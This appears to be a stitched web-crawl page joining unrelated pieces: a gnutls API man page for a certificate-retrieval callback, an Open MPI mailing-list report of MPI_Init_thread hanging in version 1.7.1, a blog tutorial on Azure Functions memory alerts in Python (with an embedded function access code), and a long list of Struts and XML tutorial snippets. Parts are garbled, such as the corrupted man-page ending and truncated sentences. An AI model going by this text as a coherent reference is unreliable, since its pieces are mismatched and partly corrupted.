Number of Ratings: 54 | http://www.microsoft.com/mspress/books/5733.aspx | crawl-002 | refinedweb | 232 | 50.12 |
gnutls_certificate_set_retrieve_function2(3)ficate_set_retrieve_function2(3)
gnutls_certificate_set_retrieve_function2 - API function
#include <gnutls/abstract.h> void gnutls_certificate_set_retrieve_function2(gnutls_certificate_credentials_t cred, gnutls_certificate_retrieve_function2 * func);
gnutls_certificate_credentials_t cred is a gnutls_certificate_credentials_t type. gnutls_certificate_retrieve_function2 * func is the callback function
This function sets a callback to be called in order to retrieve the certificate to be used in the handshake. The callback will take control only if a certificate is requested by the peer.); req_ca_dn is only used in X.509 certificates. Contains a list with the CA names that the server considers trusted. This is a hint and typically the client should send a certificate that is signed by one of these CAs. These names, when available, are DER encoded. To get a more meaningful value use the function gnutls_x509_rdn_get(). pk_algos contains a list with server's acceptable signature algorithms. The certificate returned should support the server's given algorithms. pcert should contain a single certificate and public key or a list of them. pcert_length is the size of the previous list. pkey is the private key. If the callback function is provided then gnutls will call it, in the handshake, after the certificate request message has been received. All the provided by the callback values will not be released or modified by gnutls.. If both certificates are set in the credentials and a callback is available, the callback takes pred5_.c9ertificate_set_retrieve_function2(3) | http://man7.org/linux/man-pages/man3/gnutls_certificate_set_retrieve_function2.3.html | CC-MAIN-2017-26 | refinedweb | 223 | 50.33 |
Alert on VM conditions with Azure Functions and Python
Altough the Azure Monitor with Azure Container Insights are a great solution for monitoring defferent condition of resources inside a cluster, we often need some custom solutions, at least for the performance testing on the Node.
Currently describe solution consist of the following components:
1. Azure Function — By implementing an HTTP Endpoint for receiving data from the sender.
For our PoC we have implemented the following points:
- date : Unformatted text, used for sending Date/Time information from the Sender. There is no format checker on this field, please feel free to add one, or use your own parser.
- host: For multiple senders, can be used to differentiate between hosts
- message: In this context, it is used to send output of different command executed on the selected nodes. In example sender provided, it will send the output of ps aux command
2. Sender Application — A simple Python application that use request library to make HTTP Post request towards the Azure Functions Endpoint
The alerting rules is implemented at the application level by comparing the threshold value with read value of free –m command
Implementation:
1. We will start by creating Azure Function:
- In Azure Portal will search for Function App and select the corresponding blade
- We will select a Resource Group, a unique App name and Python as Runtime stack. We can leave other setting as default for now and choose Review + Create
As the transmitted data will be save in a Storage Account, we will need to connect or Storage to Azure Function (Buinding).
We select our existing Storage Account and will get the Connection String in order to use it for writing Blobs in Containers
In Function App Blade, will choose Configuration and will add the values name and the Connection String from our Azure Storage Account:
After this operation, we will have a record containing the details for storage connectivity.
It is time to create our first function.
We choose as template: HTTP trigger function and as soon as the Function will be created, we chose the Code + Test Blade as follows:
Adding the following code in function body:
import logging
import azure.functions as func
def main(req: func.HttpRequest, outputBlob: func.Out[str]) -> func.HttpResponse:
logging.info('Python HTTP trigger function processed a request.')
date = req.params.get('date')
host = req.params.get('host')
message = req.params.get('message')
if not date:
try:
req_body = req.get_json()
except ValueError:
pass
else:
date = req_body.get('date')
if not host:
try:
req_body = req.get_json()
except ValueError:
pass
else:
host = req_body.get('host')
if not message:
try:
req_body = req.get_json()
except ValueError:
pass
else:
message = req_body.get('message')
if date and host and message:
az_output = str(date) + str(host) + str(message)
outputBlob.set(az_output)
return func.HttpResponse(f"Hello, {host}. This HTTP triggered function executed successfully.")
else:
return func.HttpResponse(
"This HTTP triggered function executed successfully. Pass a name in the query string or in the request body for a personalized response.",
status_code=200
)
On the Integration Panel we choose Azure Blob Storage, select our Storage account connection as defined previously and choose Blob parameter name. The last parameter used to call our storage binding from within the Python code. For the Path configuration, it should be in format container/blob, in our configuration it is defined as {rand-guid} which will generate a hopefully random value for the blob. Please make sure that the container is created in Storage Account before running this function.
As the coding part is over, we need to get the security code for accessing this function:
By adding this string in Postman we can see the URL and parameters of the function:
1. Implementation of Sender app
import requests
import os
import subprocess as sp
treshold = 1
used_memory = sp.getoutput("free -m | awk '/^Mem/ {print $3}'")
print(used_memory)
available_memory = sp.getoutput("free -m | awk '/^Mem/ {print $2}'")
print(available_memory)
memory_consumption = (float(used_memory) * 100/float(available_memory))
if memory_consumption > treshold:
print("Memory Usage Alert. Sending data to Storage")
output = sp. getoutput('ps aux')
data={}
data['date'] = "OvidiuBlabla"
data['host'] = "myhost"
data['message'] = output
params = {'code': 'ze7CDK1Qk_PHQFEBaM6bdgMknhM7OvPnMYtwqywVyjqI3AzIFuW0XxMQ=='}
response = requests.post('', params=params, json=data)
print(response.content)
In params we add a dictionary with the key of “code” and the value of the content of our secret code.
We have defined also a dictionary structure consisting of the three keys (date, host, message) whose values can be overwritten by our code. In our example, first two keys are statically defined, the last one, message, carry the output of ps aux command.
For sake of simplicity, current script will calculate the percentage of memory consumed on the node, if the value is higher than our threshold value, will trigger the HTTP Post call to Azure Function with the defined data values, and those values would be written in a random-ganerated-name blob on the storage account.
The drawbacks on this method is that for every alert generated, will be created a new blob in defined Container. There is not possibility to append to existing blob as for now.
The Azure Function can be called also from a command line curl as follows:
curl -X POST -H “Content-Type: application/json” -d ‘{“date”: 123456, “host”: “VirtualaMachine”, “message”: “FailureAlert”}’
No looping mechanism has been implemented for this concept. You can use a simple crontab configuration, or implement an in-code while loop with desired delay between runs.
You can define your own schema for data transfer as long as it is the same schema defined in Azure Function and Sender application. | https://ovidiuborlean.medium.com/alert-on-vm-conditions-with-azure-functions-and-python-907f6f22a9ef?source=read_next_recirc---------0---------------------e8c7e27f_7088_459b_ba5d_a6f4de429cf8------- | CC-MAIN-2022-40 | refinedweb | 931 | 53.81 |
In this article, we will study what is topological sort and how it works. We will understand the examples explaining the topological sort and the corresponding python code to get the sequence of an array following the topological sort algorithm. Lastly, we will study the time complexity of the algorithm and the applications of the topological sort. So, let’s get started!
What is Topological Sort?
Topological sort is an algorithm that takes a directed acyclic graph and returns the sequence of nodes where every node will appear before other nodes that it points to. Just to remind, a directed acyclic graph (DAG) is the graph having directed edges from one node to another but does not contain any directed cycle. Remember topological sorting for graphs is not applicable if the graph is not a Directed Acyclic Graph (DAG). The ordering of the nodes in the array is called topological ordering. Therefore we can say that a topological sort of the nodes of a directed acyclic graph is the operation of arranging the nodes in the order in such a way that if there exists an edge (i,j), i precedes j in the lists. A topological sort basically gives a sequence in which we should perform the job and helps us to check whether the graph consists of the cycle or not.
Every graph can have more than one topological sorting possible. It depends on the in-degree of the node in the graph. Also, the topological sorting of the graph starts with the node that has in-degree as 0 i.e a node with no incoming edges. Let us learn an example for a clear understanding.
Example
Consider the following directed acyclic graph with their in-degree mentioned.
Identifying vertices that have no incoming edge. Here, nodes A and F have no incoming edges.
We will choose node A as the source node and deletes this node with all its outgoing edges and put it in the result array.
Now, update the in-degree of the adjacent nodes of the source node after deleting the outgoing edges of node A
Now again delete the node with in-degree 0 and its outgoing edges and insert it in the result array. Later update the in-degree of all its adjacent nodes.
Now repeat the above steps to get output as below:
In the second step, if we have chosen the source node as F then the topological sort of the graph will be F, A, B, C, D, E. Therefore, there is more than one topological sort possible for every directed acyclic graph.
Algorithm
The algorithm of the topological sort goes like this:
- Identify the node that has no in-degree(no incoming edges) and select that node as the source node of the graph
- Delete the source node with zero in-degree and also delete all its outgoing edges from the graph. Insert the deleted vertex in the result array.
- Update the in-degree of the adjacent nodes after deleting the outgoing edges
- Repeat step 1 to step 3 until the graph is empty
The resulting array at the end of the process is called the topological ordering of the directed acyclic graph. If due to some reason, there are some nodes left but they have the incoming edges, that means that the graph is not an acyclic graph and topological ordering does not exist.
Python Code For Topological Sort
from collections import defaultdict class Graph: def __init__(self,n): self.graph = defaultdict(list) self.N = n def addEdge(self,m,n): self.graph[m].append(n) def sortUtil(self,n,visited,stack): visited[n] = True for element in self.graph[n]: if visited[element] == False: self.sortUtil(element,visited,stack) stack.insert(0,n) def topologicalSort(self): visited = [False]*self.N stack =[] for element in range(self.N): if visited[element] == False: self.sortUtil(element,visited,stack) print(stack) graph = Graph(5) graph.addEdge(0,1); graph.addEdge(0,3); graph.addEdge(1,2); graph.addEdge(2,3); graph.addEdge(2,4); graph.addEdge(3,4); print("The Topological Sort Of The Graph Is: ") graph.topologicalSort()
Output
The Topological Sort Of The Graph Is:
[0, 1, 2, 3, 4]
Topological Sort Time Complexity
The running time complexity of the topological sorting algorithm is O(M + N) where the M is the number of edges in the graph and N is the number of nodes in the graph. We have to determine the in-degree of each node in the graph which takes total O(M) time and then runs the simple loop to place all the nodes in the result array by checking the in-degrees to be zero which takes total O(N) time for N number of nodes. Therefore the total time complexity of the program will be O(M+N). The space complexity for the algorithm will be O(N) where N is the total number of nodes in the graph to allocate the nodes in the result array.
Applications
- Topological sort can be used to quickly find the shortest paths from the weighted directed acyclic graph.
- It is used to check whether there exists a cycle in the graph or not
- Topological sort is useful to find the deadlock condition in an operating system
- It is used in course scheduling problems to schedule jobs
- It is used to find the dependency resolution
- Topological sort is very useful to find sentence ordering in very fewer efforts
- It is used in manufacturing workflows or data serialization in an application
- It is used for ordering the cell evaluation while recomputing formula values in an excel sheet or spreadsheet.
Conclusion
It is easy to determine the order of the compilation tasks to perform using the topological algorithm. With many different applications in real life, topological sort has its own importance while exploring and working trees and graphs. Topological sort makes the process easier and efficient and hence very much recommended to clearly understand it. | https://favtutor.com/blogs/topological-sort-python | CC-MAIN-2022-05 | refinedweb | 998 | 60.14 |
That sinking feeling
Italy may look like Greece writ large, but the truth is more complex
EVER since the euro zone's sovereign-debt crisis began in earnest two years ago, the common fear has been that the sheer bulk of Italy meant it was too big for other countries to bail out, should it sink.
A quieter hope was that Italy's size might also save it. If investors rushed out of Italian bonds, went the whispered argument, there were few big markets where they could then park their euros and still get a decent return (the smaller German bond market could not accommodate everyone without yields falling sharply). Scared investors often rush into the big and liquid market for US Treasuries, despite anxieties about America's public finances. That safety-in-numbers logic ought to keep Italy from trouble, too.
Some hope: Italian bonds are now a badge of shame for banks who are rushing to dispose of them (see article). Their ten-year yields have jumped beyond 7% and, once euro-zone yields reach these levels, they tend to spiral out of control.
For some this proves that Italy is an oversize Greece: a country with a debt burden that is too heavy for it to bear and, unlike Greece, for others to help shoulder. There are uncomfortable parallels. Both countries' public debts have long been bigger than their annual GDP. Both suffer crippling rigidities in their economies. But there are enough differences in Italy's finances, and enough potential in its economy, to mean it could stay solvent if its borrowing costs could be capped at, say, 6%.
Start with the finances. One reason why markets eventually shunned Greece, Portugal and Ireland was the uncertainty about how far their debts might rise. All three had huge budget deficits (so were adding to their debts at an alarming rate) and were struggling to keep their economies on track, while at the same time cutting spending and raising taxes. Greece's public debt was forecast to rise towards 190% of GDP, before some of its private-sector creditors agreed to a bigger write-off of what they are owed. Italy's public debt, by contrast, is set to stabilise at around 120% of GDP in 2012. Its government will run a small surplus on its “primary” budget (ie, excluding interest costs) this year, and an overall deficit of less than 4% of GDP, below the euro-area average.
From the November 12th 2011 edition
Discover stories from this section and more in the list of contentsExplore the edition | https://www.economist.com/briefing/2011/11/12/that-sinking-feeling | CC-MAIN-2022-27 | refinedweb | 430 | 66.17 |
I had been trying to make digital books. However, I wanted to split it into pages and had been wondering if there was a way to store entire chapters and use tags, like html, sort of, to tell it what to put into the text area for each page. I tried something like this and it's kind of working, though it's losing the first word in between each of the tags. I don't care if the tags themselves aren't read in. But how do I get the first words in? This may also lead to Scanner redundancy reading, but would reduce space wise the amount I'd have to use.
Code java:
import javax.swing.JTextArea; import javax.swing.JScrollPane; import javax.swing.JFrame; import javax.swing.JPanel; import java.io.File; import java.util.Scanner; import java.awt.GridLayout; import java.util.NoSuchElementException; import java.io.FileNotFoundException; import java.io.BufferedReader; import java.io.FileReader; import java.io.LineNumberReader; import java.io.IOException; public class FileReadingTesting { public static void main(String[] args) { Scanner console = null; LineNumberReader lnr = null; String areaText = ""; String area2Text = ""; String area3Text = ""; try{ console = new Scanner(new File("Silly.txt")); } catch(FileNotFoundException fnfe) { System.out.println("Not found."); } Scanner lineScanner = null; while(console.hasNext()) { //System.out.println(console.next()); if (console.next().equals("<Page1>")) { while (!console.next().equals("</Page1>")) { String nextInputLine = console.nextLine(); lineScanner = new Scanner(nextInputLine); while(lineScanner.hasNext()) { areaText = areaText + lineScanner.nextLine(); } areaText = areaText + "\n"; } } } System.out.println(areaText); JFrame wenguin = new JFrame("Parsing test"); wenguin.setVisible(true); JPanel panel = new JPanel(); wenguin.setContentPane(panel); JTextArea area = new JTextArea(100,100); JScrollPane pane = new JScrollPane(area, JScrollPane.VERTICAL_SCROLLBAR_AS_NEEDED, JScrollPane.HORIZONTAL_SCROLLBAR_AS_NEEDED); JTextArea area2 = new JTextArea(100,100); JScrollPane pane2 = new JScrollPane(area2, JScrollPane.VERTICAL_SCROLLBAR_AS_NEEDED, JScrollPane.HORIZONTAL_SCROLLBAR_AS_NEEDED); JTextArea area3 = new JTextArea(100,100); JScrollPane pane3 = new JScrollPane(area3, JScrollPane.VERTICAL_SCROLLBAR_AS_NEEDED, JScrollPane.HORIZONTAL_SCROLLBAR_AS_NEEDED); panel.setLayout(new GridLayout(3,1)); panel.add(pane); panel.add(pane2); panel.add(pane3); char c = 'a'; String t = ""; area.setText(areaText); wenguin.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE); } }
It is giving me this:
is a sample paragraph. It is being used to see if I can only scan part of a document and stop at line breaks. Hopefully I can.
it is being used to check to see if I can also stop when a page is done. Let's see if it works.
But I wanted it to give me this:
This is a sample paragraph. It is being used to see if I can only scan part of a document and stop at line
breaks. Hopefully I can.
Also, it is being used to check to see if I can also stop when a page is done. Let's see if it works.
How do I fix that? | http://www.javaprogrammingforums.com/%20whats-wrong-my-code/13643-not-able-read-textfiel-way-its-supposed-printingthethread.html | CC-MAIN-2014-15 | refinedweb | 458 | 54.9 |
FuzzyTheta implements fuzzy cut prescriptions.
More...
#include <FuzzyTheta.h>
FuzzyTheta implements fuzzy cut prescriptions.
Definition at line 57 of file FuzzyTheta.
Return the overlap integral of the delta approximation with the given box and center.
This default version assumes a box approximation. All values are assumed to be in units of the width considered.
Definition at line 92 of file FuzzyTheta.h.
Function used to read in object persistently.
Function used to write out object persistently.
Return the (compact) support of the delta approximation considered, given its center value.
Definition at line 82 of file FuzzyTheta.h.
The static object used to initialize the description of this class.
Indicates that this is a concrete class with persistent data.
Definition at line 303 of file FuzzyTheta.h. | https://thepeg.hepforge.org/doxygen/classThePEG_1_1FuzzyTheta.html | CC-MAIN-2018-39 | refinedweb | 126 | 54.18 |
This has always been broken for s390x since it was introduced in 67a5a0afb3100e7986ce127b3c2684e01c97304e. The fix ensures that both s390 and s390x do not start a second shell on the console that collides with init=linuxrc.s390 blocking on console input and potentially providing a rescue shell after hitting return. Apparently LOADER_FLAGS_NOUSB has gone meanwhile but nobody noticed since this code path referencing it was never compiled on s390x. --- loader/loader.c | 4 ++-- 1 files changed, 2 insertions(+), 2 deletions(-) diff --git a/loader/loader.c b/loader/loader.c index 69523cd..eefa520 100644 --- a/loader/loader.c +++ b/loader/loader.c @@ -1891,8 +1891,8 @@ int main(int argc, char ** argv) { flags |= LOADER_FLAGS_KICKSTART_SEND_MAC; /* JKFIXME: I do NOT like this... it also looks kind of bogus */ -#if defined(__s390__) && !defined(__s390x__) - flags |= LOADER_FLAGS_NOSHELL | LOADER_FLAGS_NOUSB; +#if defined(__s390__) || defined(__s390x__) + flags |= LOADER_FLAGS_NOSHELL; #endif openLog(FL_TESTING(flags)); -- 1.6.5 | https://www.redhat.com/archives/anaconda-devel-list/2009-October/msg00325.html | CC-MAIN-2015-22 | refinedweb | 147 | 59.4 |
Use the span API to manually create spans for methods of interest. The API is extremely flexible, and offers the ability to customize your spans, by adding labels to them, or by changing the type, name, or timestamp.
OpenTracing fan? You can use the OpenTracing API, instead of the Agent API, to manually create spans.
How to create spans with the span APIedit
- Get the current span with
currentSpan(), which may or may not have been created with auto-instrumentation.
- Create a child span with
startSpan().
- Activate the span with
activate().
- Customize the span with the span API.
import co.elastic.apm.api.ElasticApm; import co.elastic.apm.api.Span; Span parent = ElasticApm.currentSpan(); Span span = parent.startSpan(); try (Scope scope = span.activate()) { span.setName("SELECT FROM customer"); span.addLabel("foo", "bar"); // do your thing... } catch (Exception e) { span.captureException(e); throw e; } finally { span.end(); }
Combine with annotationsedit); } | https://www.elastic.co/guide/en/apm/agent/java/1.x/method-api.html | CC-MAIN-2020-29 | refinedweb | 149 | 54.79 |
Subject: [OMPI users] MPI_Init_thread hangs in OpenMPI 1.7.1 when using --enable-mpi-thread-multiple
From: Elias Rudberg (elias.rudberg_at_[hidden])
Date: 2013-06-16 11:54:46
Hello!
I would like to report what seems to be a bug in MPI_Init_thread in
OpenMPI 1.7.1.
The bug can be reproduced with the following test program
(test_mpi_thread_support.c):
===========================================
#include <mpi.h>
#include <stdio.h>
int main(int argc, const char* argv[]) {
int provided = -1;
printf("Calling MPI_Init_thread...\n");
MPI_Init_thread(NULL, NULL, MPI_THREAD_MULTIPLE, &provided);
printf("MPI_Init_thread returned, provided = %d\n", provided);
MPI_Finalize();
return 0;
}
===========================================
When trying to run this when OpenMPI was configured with
--enable-mpi-thread-multiple, the program hangs when trying to run
using anything more than one process.
Steps I use to reproduce this in Ubuntu:
(1) Download openmpi-1.7.1.tar.gz
(2) Configure like this:
./configure --enable-mpi-thread-multiple
(3) make
(4) Compile test program like this:
mpicc test_mpi_thread_support.c
(5) Run like this:
mpirun -np 2 ./a.out
Then you see the following two lines of output:
Calling MPI_Init_thread...
Calling MPI_Init_thread...
And then it hangs.
MPI_Init_thread did not hang in earlier OpenMPI versions (for example
it worked in 1.5.* and 1.6.*), so it seems like a bug introduced in 1.7.
The description above shows how I reproduce this in Ubuntu on my local
desktop computer, but the same problem exists for the OpenMPI 1.7.1
installation at the UPPMAX computer center where I wan to run my code
in the end. I don't know all details about how they installed it
there, but I know they set --enable-mpi-thread-multiple. So maybe it
hangs in 1.7.1 on any computer as long as you use MPI_THREAD_MULTIPLE.
At least I have not seen it work anywhere.
Do you agree that this is a bug, or am I doing something wrong?
Best regards,
Elias | http://www.open-mpi.org/community/lists/users/2013/06/22106.php | CC-MAIN-2014-35 | refinedweb | 318 | 68.87 |
Sage: How to import a graph from a shapefile into Sage?
I would like to import a graph and afterwards use functions from the networkx library in the Sage Notebook. Python is totally new for me and I have not that much experience with programming. How to transfer a shapefile into Sage? I tried
import networkx as nx g=nx.read_shp(r‘D:\Useres\...\ver06_l.shp’)
That gives
ImportError: read_shp requires OGR:
Unfortunately, this link doesn’t help me. Thank you in advance
Looks like this requires a special library to be loaded.
Well, it's not clear how exactly you run Sage. Do you run it in a VM on Windows?
installing gdal is not easy. You might be better off doing a conversion of shapfiles into networkx graphs in an installation of Python with gdal installed, and writing these graphs into files; and then read the latter files in Sage.
Yes, I run it in the Oracle VM. Thanks for your answers! | https://ask.sagemath.org/question/24300/sage-how-to-import-a-graph-from-a-shapefile-into-sage/ | CC-MAIN-2018-13 | refinedweb | 164 | 76.32 |
anarchintosh Wrote:hey t0mm0 this looks great! if you have any queries or questions you can PM me.
i'm currently sitting on an updated megaup resolver (i wrote a few months ago) that i'd like to commit to your repo, could you add me with write access? cheers.
EDIT: don't worry, i will submit a pull request
cloom Wrote:Hello t0mm0,
I have a bunch of ideas for plugins ongoing and I can't wait to have your module working to publish my plugins.
I can't find the file test.py you are talking about, is it in GIT?
Can you post it here please? I would like to give it a try.
Thank you.
import urlresolver
stream_url = urlresolver.resolve(web_url)
if stream_url:
xbmcplugin.setResolvedUrl(plugin_handle, True,
xbmcgui.ListItem(path=stream_url))
else:
xbmcplugin.setResolvedUrl(plugin_handle, False,
xbmcgui.ListItem())
anarchintosh Wrote:@t0mm0
yeah GPLv3 is great. (better than v2 IMO). my later code i began to put GPLv3 in.
anarchintosh Wrote:i think you were right about a simple structure. me and unbehagan went with a slighty overkill interface previously.
'log in to everything' sounds good. could maybe even execute this on XBMC start up using autoexec.py (Dharma) / Services (Eden)
anarchintosh Wrote:Bear in mind that some things (ie. hotfile premium) have an API which just asks for the user + pass in the request url.
For those type resolvers it would still be good to rig together a simple html form filling (see megaup resolver) login routine (just as a way of verifying whether the user + pass are vaild)
anarchintosh Wrote:once it is basically up and running i reckon it will be very popular and quickly attract a lot of resolver contributers. it's also possible to manually translate the jdownloader java plugins' source code for things like fileserve/sonic etc
anarchintosh Wrote:there were some problems with the updated megaup resolver... so i'll have to hsve another look at it.
if urlresolver.novamov.working == true and urlresolver.novamov.exists == true
novamov=re.compile('href=""').findall(html)
rogerthis Wrote:Would it be possible to add a flag for working as each module could stop working at any time and need to get updated?
So in my addon I could have something like this
Code:if urlresolver.novamov.working == true and urlresolver.novamov.exists == true
novamov=re.compile('href=""').findall(html)
This would enable my addon to only scrap working links.
rogerthis Wrote:So, a page like this that has multiple links, it will find all the links. It wouldn't really want to resolve the final playable url until you select which one you wanted. That would be too much work (too slow), wouldn't it?
rogerthis Wrote:Also there are sites like this that have redirects to itself before you get to the video site url. Would it be able to handle this? | https://forum.kodi.tv/printthread.php?tid=105707 | CC-MAIN-2018-47 | refinedweb | 480 | 68.16 |
See Also edit
- directory notification package in Tcl
- for Linux
- Tcl-Inotify
- an efficient Linux-only solution
- TWAPI
- has the begin_filesystem_monitor/cancel_filesystem_monitor [1] functions to allow you to monitor file system changes by registering a callback. Like the rest of TWAPI, WIndoes NT 4.0 and later only. See [2] for an example.
- watchman
- A service that can watch for changes on Linux, OS X, FreeBSD, OpenBSD and Illumos/Solaris and abstracts away the differences between those platforms. It can be controlled using the command line or a JSON API spoken over a UNIX socket. In both cases watchman returns JSON output.
- filewatcherd
- FreeBSD daemon
Generic Solution editNot a complete solution, but on the systems where [file mtime] returns the last update of a directory/file a reasonably efficient solution is just glob all files in a directory tree and storing their mtime. If you are only interested in create/rename/delete events (like most UIs are) you only need to call [file mtime $dir] to see if a file has been created/renamed/deleted since you last checked. Doing this every two seconds gives good interactive response in most cases (for UIs)US: Just to emphasize: This does not work for write/update operations on a file!
namespace eval fschanges { if {0} { #if debugging: interp alias {} [namespace current]::dputs {} puts } else { proc dputs {args} { } } variable watchId 0 proc watch {file_or_dir} { variable watchId incr watchId upvar [namespace current]::watch$watchId watching if {[info exists [namespace current]::watch$watchId]} { array unset [namespace current]::watch$watchId } set watching(watching) [list] if {[file isdir $file_or_dir]} { addDir watch$watchId $file_or_dir } else { add watch$watchId $file_or_dir } #set initial scan time set watching(last) [clock seconds] return watch$watchId } proc add {id name} { dputs "add $name" upvar [namespace current]::$id watching if {[info exists watching(watch.$name)]} { dputs "add exists $name" #no watching twice! return } lappend watching(watching) $name [file isdir $name] #and determine initial time (if any) if {[file exists $name]} { set itime [file mtime $name] } else { set itime 0 } set watching(watch.$name) $itime return $name } proc addDir {id dir} { dputs "Add dir $dir" upvar [namespace current]::$id watching if {[info exists watching(watch.$dir)]} { dputs "Adddir exists $dir" #no watching twice! return } #puts "Add dir $dir" lappend new [add $id $dir] #puts "glob: [glob -nocomplain -path $dir/ *]" foreach file [glob -nocomplain -path $dir/ *] { if {[file isdir $file]} { dputs "Recurse into $file" set new [concat $new [addDir $id $file]] } else { lappend new [add $id $file] } } return $new } proc newfiles {id time} { upvar [namespace current]::$id watching set newer [list] foreach {file isdir} $watching(watching) { if {$watching(watch.$file) >= $time} { lappend newer $file } } return $newer } proc changes {id} { upvar [namespace current]::$id watching set changes [list] set new [list] #puts $watching(watching) foreach {file isdir} $watching(watching) { #puts "$isdir && [file mtime $file] > $watching(watch.$file)" if {$isdir && [file exists $file] && [file mtime $file] > $watching(watch.$file)} { set watching(watch.$file) [file mtime $file] lappend changes $file update foreach item [glob -nocomplain -dir $file *] { if {![info exists watching(watch.$item)]} { if {[file isdir $item]} { set new [concat $new [addDir $id $item]] } else { lappend new [add $id $item] } } } } } foreach item $new { lappend changes $item created } return $changes } namespace export watch changes newfiles } package provide fschanges 0.5Sample usage
package require fschanges namespace import fschanges::* #watch a directory: set w [watch /tmp] puts "Files created within the last hour: [newfiles $w [expr [clock seconds]-3600]]" exec touch /tmp/testfile #Show the new file and directory update: puts [changes $w] file delete -force /tmp/testfile #file deletions are not noted (yet) but it will show an updated directory. puts [changes $w]
Platform specific Which platforms can do this? It would be nice to create a (core?) extension to do this.
- Windows 95, 98, ME, NT 2000, XP: Yes, [FindFirstChangeNotification]() and NTFS can do [file mtime $dir]
- Windows CE: unknown but also likely to support FindFirstChangeNotification.
- Linux <2.2: Unknown, but ext2 can do [file mtime $dir]
- Linux 2.2+: Yes, see linux/Documentation/dnotify.txt using fcntl(fd, F_NOTIFY,DN_MODIFY|DN_CREATE|DN_MULTISHOT); See directory notification package in Tcl for more.
- FreeBSD: Yes, [kqueue]:
- OpenBSD: Supports kqueue in version 3.1 (unknown when first supported)/
- (Other)BSD: Same as FreeBSD? NetBSD supports kqueue since 2.0
- Classic Mac: Unknown
- MacOSX: Supports kqueue starting with 10.3
- Solaris: stevel thought so.
- HP-UX: unknown
- irix: yes. there's a file monitor.
- dec: unknown
- others: ???
elfring 2003-08-26: How do you think about the tool "File Alteration Monitor and Inode Monitor" (
MHo: See ffcn for several (incomplete) solutions. I think, the drawback of tcl-only-solutions are that they are based on polling, whereas the windows-apis are event-based. Because the MS-APIs are, as usual, pure horror, TWAPI seems to be the most elegant way, but because TWAPI is a big monolithic block, the code blows up.APN: MHo, could you explain what you mean by the code blows up? I'd like to fix any bugs in TWAPI. MHo: sorry, perhaps this was the wrong phrase. I meant that: the code one have to write is usually clear and small, because the commands of TWAPI are very powerfull. What I forgot to mention is that I almost always deploy programs as starpacks (=executables). And the twapi dll is very heavy in size. | http://wiki.tcl.tk/9654 | CC-MAIN-2017-26 | refinedweb | 884 | 54.02 |
]:
but still there is one error
Developing Simple Struts Tiles Application
Developing Simple Struts Tiles Application
... will show you how to develop simple Struts Tiles
Application. You will learn how to setup the Struts Tiles and create example
page with it.
What is Struts - Struts
Inserting Tiles in JSP Can we insert more than one tiles in a JSP page
using tiles without struts
using tiles without struts Hi
I am trying to make an application using tiles 2.0.
Description of my web.xml is as follows:
tiles...
org.apache.tiles.impl.BasicTilesContainer.DEFINITIONS_CONFIG
/WEB-INF/tiles-defs.xml
XML Tutorial
XML Tutorial
XML
Tutorial:
XML stands for EXtensible Markup Language. In our XML tutorial you will learn what XML is and the difference between XML and HTML. You will also learn how to start using XML in your applications
Hibernate beginner tutorial
Hibernate the beginner tutorial - Essential Hibernate tutorials for beginner
Hibernate: This beginning tutorial on Hibernate has been design to fulfill... of expertise in using the same. It provides you the content and expertise so
Java Tutorial
Java Tutorials
If you are a beginner and looking for the Java tutorials... tutorial.
Then learn our
Master Java In A Week tutorial
Learn the
JDBC
Learn JSP
Learn Struts
and programming tutorial for beginner
Hibernate programming tutorial for beginner Hi,
I am beginner... the link: Hibernate beginner tutorial.
This link contains many tutorials... quick tutorial for learning Hibernate. Can someone point me to a step by step
redirect with tiles - Struts
specify in detail and send me code.
Thanks. I using tiles in struts 2. And i want redirect to other definition tag by url tag. Please help me... and notPresent Tags
Struts 2 Tutorial Section
Introduction
to Struts 2
Struts 2.2.1 - Struts 2.2.1 Tutorial
Struts 2.2.1 - Struts 2.2.1 Tutorial
The Struts 2.2.1 framework is released... pattern. It is one of the most
used frameworks to create web applications using MVC... for advance programming.
In this section we are providing complete tutorial on Struts
java beginner
java beginner hai a i'm beginner 2 java...
i want to fetch data from database using combo box(drop down list) without using javascript...when i... that should take from db..i,e fetched from db only...
n also give me a good example
beginner
beginner provide me html program to form a registration form using controls like radio button for gender, displaying of alert message when have not entered a value
beginner
beginner pls provide me a simple HTML program for a registeration form ,using radio button for gender, and display ALERT messsage when have not entered/filled anything in text box
wml tutorial
language (WML), which is a subset of extensible markup language (XML). Using... sites using wml, this tutorial is for you.
WAP..., the way using your WAP Phone should be. Just one more reason to make WAP Terror your
Downloading MyFaces example integrated with tomahawk
;
Downloading :
If you are beginner in the field of JSF framework then really... has provided
examples in a zipped format. These examples are good...
Here we will be using myfaces-example-simple-1.1.6.war
to understand features
java beginner
java beginner Hi
how to sort list of element containing a data object like date of birth of employee.
display employee in youngest first and oldest last , using one of the collection class for sorting
tiles - Struts
Tiles in Struts Example of Titles in Struts Hi,We will provide you the running example by tomorrow.Thanks Hi,We will provide you the running example by tomorrow.Thanks
Struts Tutorial
In this section we will discuss about Struts.
This tutorial will contain...,
internationalization, error handling, tiles layout etc. Struts framework is also... known as Struts 1, and Struts 2 (till the time of writing this
tutorial
XML, XML Tutorial, XML Tutorial Online, XML Examples, XML Tutorial Example
with the help of tutorials and example
code. If you are a beginner in XML then learn....
XML is easy to learn technology. You can create xml file using a text editor... start learning XML using
following tutorials:
What is XML?
Why XML
Beginners Stuts tutorial.
had seen how we
can improvise our own MVC implementation without using Struts..., favor the Struts
Framework .In this tutorial on Struts, the author explains... Development Team and author of Struts Tutorial , Ted Husted,
had to admit
Tutorial for total beginner in Java
Tutorial for total beginner in Java - Explains the Basics of Java programming language.
This is a video tutorial for total beginner in Java. In this video... math operations such
add addition using integer variables. This tutorial Tutorials
Tutorial
This complete reference of Jakarta Struts shows you how to develop Struts... is provided with the example code. Many advance topics like Tiles, Struts Validation Framework, Java Script validations are covered in this tutorial.
Using
SQL for Beginner
SQL for Beginner
The Tutorial brings a unique introduction on SQL for beginners, who
want to learn and understand SQL in easy steps. The Tutorial provides you
Struts Books
;
Programming Jakarta Struts: Using Tiles... Tag Library. Using Tiles. The JSTL and Struts. Internationalization (I18N... started really quickly? Get Jakarta Struts Live for free, written by Rick Hightower
struts tiles framework
struts tiles framework how could i include tld files in my web application
How to create one xml file from existing xml file's body?
How to create one xml file from existing xml file's body? Hi, i'm... from an xml doc's body to develope another xml with that content.I'm using JDOm in my project.Could anybody help me to know about this as i'm a beginner
Hibernate One to One Mapping using XML
In this section, you will learn One to One mapping of table in Hibernate using Xml
Struts 1 Tutorial and example programs
of the Struts Framework.
Using Struts... struts ActionFrom class and jsp page.
